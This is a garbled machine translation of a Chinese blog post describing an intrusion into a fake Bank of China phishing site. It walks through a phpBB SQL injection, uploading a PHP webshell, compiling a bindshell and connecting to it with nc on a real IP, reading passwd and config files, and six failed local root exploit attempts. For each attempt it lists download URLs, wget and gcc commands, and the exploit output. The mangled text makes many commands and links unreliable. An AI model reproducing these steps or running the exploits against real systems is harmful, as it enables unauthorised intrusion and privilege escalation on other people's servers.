Illegal Bank of China (www.banochi.net) intrusion attempts

Source: Internet
Author: User
Tags upload php
Author: AKO

Http://www.coolersky.com/

I was not planning to make this unsuccessful
Intrusion
I wrote it out, but a few of my friends wanted to see that since they can communicate internally, there is nothing to be seen. Just come out, and beginners can learn from it, I want to learn more.
On the evening of the 27 th, I saw a report from tianyao:

The Bank of China website once again encountered a clone of a fake website in North America

, This site reprint path:
_
Blank>
Http://www.coolersky.com/web/news/20050228014041.asp
I had to sort out the plan. Now that this is the case, let's take a look. Don't talk nonsense, start!
1. Collect information

Service
Device information:
Apache/1.3.33
PHP/4.3.9
Main website file:
_
Blank>
Http://www.banochi.net/english/index.shtml
Looking at fake websites, there is basically no available content. It is estimated that there are only records.
Password
And ip cgi program. Besides
Service
Tool
Intrusion
, You can also consider.
I searched other sites and analyzed the injection of several PHP sites, which were not used too much. Think of the phpBB cave, write Section
Code
Search the Viewtopic. php file and find a phpbb2.0.10 file.
Intrusion
Point
_
Blank>
Http://www.bits-clsu.org/forum/viewtopic.php? T = 1
After the event, I remembered that I could use a side note.
Tools
Search directly. They are all the same.
2. Upload
Trojan

Using phpBB holes,
Vulnerabilities
Introduction
"PhpBB Remote Arbitrary SQL Injection Vulnerability
","
Phpbbsql
Injection
Vulnerabilities
Analysis "Upload PHP webshells.
3. Generate bindshell
When I was still reading the file, Edward made a bindshell! Basic method:
Upload bindshell. c
Gcc-O/tmp/Bind bindshell. c
/Tmp/Bind

NC to see, it is more convenient in shell.
NC-VV 216.22.48.72 7758

4. Collect System Information
After obtaining webshell, you can obtain some basic information, including passwd and httpd. conf, and retrieve the absolute path of a false website/home/banochin/public.
_
Html/, in webshell view the file creation period is
Service
The following files are available in its cgi-bin directory:
Last modified size attribute on file creation date
[Member] 21:39:03 21:39:03 0700
Errlog. dat 00:32:22 00:32:22 140.186 kb 0600
Id. dat 10:48:35 10:48:35 1.727 kb 0600
Index.htm 03:19:51 03:19:51 0.697 kb 0644
PWD. dat 00:36:15 00:36:15 0.170 kb 0600
Pwdbak. dat 03:24:17 03:19:55 0.516 kb 0600
Security. cgi 03:24:03 03:20:00 44.363 kb 0700
Visemailer. cgi 03:24:04 03:20:02 3.554 kb 0700

You can see
Password
The date is July 22, February 25. After browsing the directory, I found that the contents of the Bank of China website in many other languages are also included, but they are basically HTML files, which must have been dumped directly from the Bank of China webdump.
Kernel information, because we do not have the write permission on its directory, the next thing we need to do is to escalate the permission. It took about one hour before and after, while it took me more than a day to raise the right. The result was still not completed, so I was depressed!
Uname-R
2.4.20-021stab022. 11.777-Enterprise

5. Local permission escalation Test

Add environment variable
Export Path =/usr/bin: $ path
Otherwise, the error "collect2: cannot find 'ld" will appear!
(1) Linux kernel moxa serial drive BSS Overflow
Vulnerabilities
Grsecurity 2.1.0 release/5 Linux kernel advisories
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 7446 & keyword =

_
Blank>
Http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
File:

[Url = target = _ blank #?> _ Andhttp: // grsecurity.net /~ Vertex der/exploits
_
And
_
Patches. tgz
Test:
Wget
[Url = target = _ blank #?> _ Andhttp: // grsecurity.net /~ Vertex der/exploits
_
And
_
Patches. tgz
Tar-zxvf exploits
_
And
_
Patches. tgz
CD exploits
_
And
_
Patches
Make alloc = 0x100000
------------------------------------------------------------------------
NASM-F elf-dallocate = 32482374 mlock-dos.S
Make: NASM: Command not found
Make: *** [all] Error 127
------------------------------------------------------------------------
Conclusion:
The NASM is missing and cannot be installed even if the RPM is uploaded!
(2) Linux kernel uselib () Privilege Escalation
Vulnerabilities
Linux Kernel sys
_
Uselib Local Root Vulnerability
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 7326 & keyword =

_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 110513415105841 & Q = raw

_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 110512575901427 & W = 2

_
Blank>
Http://isec.pl/vulnerabilities/isec-0021-uselib.txt
File:

_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 110512575901427 & Q = P3
Test:
Gcc-O2-fomit-frame-pointer elflbl
_
V108.c-O elflbl
_
V108
------------------------------------------------------------------------
Elflbl
_
V108.c: In function 'check
_
VMA
_
Flags ':
Elflbl
_
V108.c: 545: Warning: deprecated use of label at end of compound statement
------------------------------------------------------------------------
./Elflbl
_
V108
------------------------------------------------------------------------
Child 1 VMAs 0
[+] Moved stack bff73000, task
_
Size = 0xc0000000, map
_
Base = 0xbf800000
[+] Vmalloc area 0xc7c00000-0xcf707000
Wait...-segmentation fault
-------------------------------------------------------------------------
Gcc-O2-fomit-frame-pointer elflbl
_
V109.c-O elflbl
_
V109
./Elflbl
_
V109
------------------------------------------------------------------------
[+] Slab cleanup
[-] Failed: Get
_
Slab
_
Objs:/proc/slabinfo not readable? (No such file or directory)
SH: Line 9: 24080 killed./elflbl
_
V109
------------------------------------------------------------------------
(3) Local integer overflow and Memory leakage in Linux Kernel
Vulnerabilities
Fun
Linux
Kernel
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 7269 & keyword =

_
Blank>
Http://marc.theaimsgroup.com /? L = full-disclosure & M = 110374209001676 & W = 2
Test:
Gcc-O VC
_
Resize. c
./VC
_
Resize
------------------------------------------------------------------------
Open: no such device or address
------------------------------------------------------------------------
GCC memory
_
Leak. C-o memory
_
Leak
------------------------------------------------------------------------
Memory
_
Leak. C: 80: 2: Warning: No newline at end of File
------------------------------------------------------------------------
(4) Linux kernel do
_
Mremap VMA local permission escalation
Vulnerabilities
Linux Kernel do
_
Mremap VMA Limit Local Privilege Escalation
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 6102 & keyword = % CC % E1 % C9 % FD

_
Blank>
Http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
File:

_
Http://rhea.oamk.fi /~ Pyanil00/temp/mremap
_
Pte. c
Test:
Gcc-O3-static-fomit-frame-pointer mremap
_
Pte. C-o mremap
_
Pte
./Mremap
_
Pte
------------------------------------------------------------------------
[+] Kernel 2.4.20-021stab022. 11.777-enterprise vulnerable: Yes exploitable Yes
MMAP #65530 0x50bfa000-0x50bfb000
[-] Failed
------------------------------------------------------------------------
(5) privilege escalation for Linux kernel kmod/ptrace competitive conditions
Vulnerabilities

Linux
Kmod/ptrace bug-Details
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 4570 & keyword = % CC % E1 % C9 % FD

_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 104811209231385 & W = 2
File:

_
Blank>
Http://august.v-lo.krakow.pl /~ Anszom/km3.c
Test:
Gcc-O km3 km3.c
./Km3?
------------------------------------------------------------------------
Usage:./km3 [-D] [-B] [-R] [-S] [-C executable]
-D -- use double-ptrace method (to run interactive programs)
-B -- start bindshell on port 4112.
-R -- Support randomized PIDs
-C -- choose executable to start
-S -- single-shot mode-abort if unsuccessful at the first try
------------------------------------------------------------------------
./Km3-S
------------------------------------------------------------------------
Linux kmod + ptrace Local Root Exploit
=> Simple mode, executing/usr/bin/ID>/dev/tty
Sizeof (shellcode) = 95
=> Child process started ..........
Failed
------------------------------------------------------------------------

(6) Linux kernel i386 SMP page error processor Privilege Escalation
Vulnerabilities
Linux Kernel i386 SMP Page Fault Handler Privilege Escalation
URL:

[Url = target = _ blank #?> _ Bug & Do = view & bughttp: // www.nsfocus.net/index.php? Act = Sec
_
Bug & Do = view & bug
_
Id = 7338

_
Blank>
Http://marc.theaimsgroup.com /? L = BugTraq & M = 110554694522719 & W = 2
Test:
Gcc-o smp. c
./SMP
------------------------------------------------------------------------
[+] In thread 1 (pid = 5400)
[+] In thread 2 (pid = 5401)
[+] Rdtsc calibrdation: 53428
[+] Exploiting race, wait...
[-] Unable to exploit race in 30 s,
Kernel patched or load too high.
------------------------------------------------------------------------

Failed to try multiple Local Elevation of Privilege! Very depressing! During the test, the fake website has been closed. Although the file is still in progress, it is clear that the official team has made great efforts and achieved good results.
6. Others
I found a few
Linux
The root permission is required. While
Service
It is estimated that sniffer is useless for remote connection to SSH, so there is no idea at the moment to clean up exp and log files.
The above are some of my test results, and the results are not obtained as root, but I sorted out the relevant
Vulnerabilities
In the future. I published the relevant results in the webmaster group, and no one answered. I don't know if everyone is too busy...
There is no special handling in this article
Vulnerabilities
And the results, can be used directly if you are interested, but there is no need to embarrass other sites, I want you to understand what I mean!
After so long, there are still a lot of work to do! Hope it won't be said by the boss, huh, huh!
Finally, I would like to thank Edward, la, and some of our colleagues!
The article can be reproduced at will, but please indicate the source, especially the whole and part of the content in this article shall not be used in any business or
Billing
Action. Thank you!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.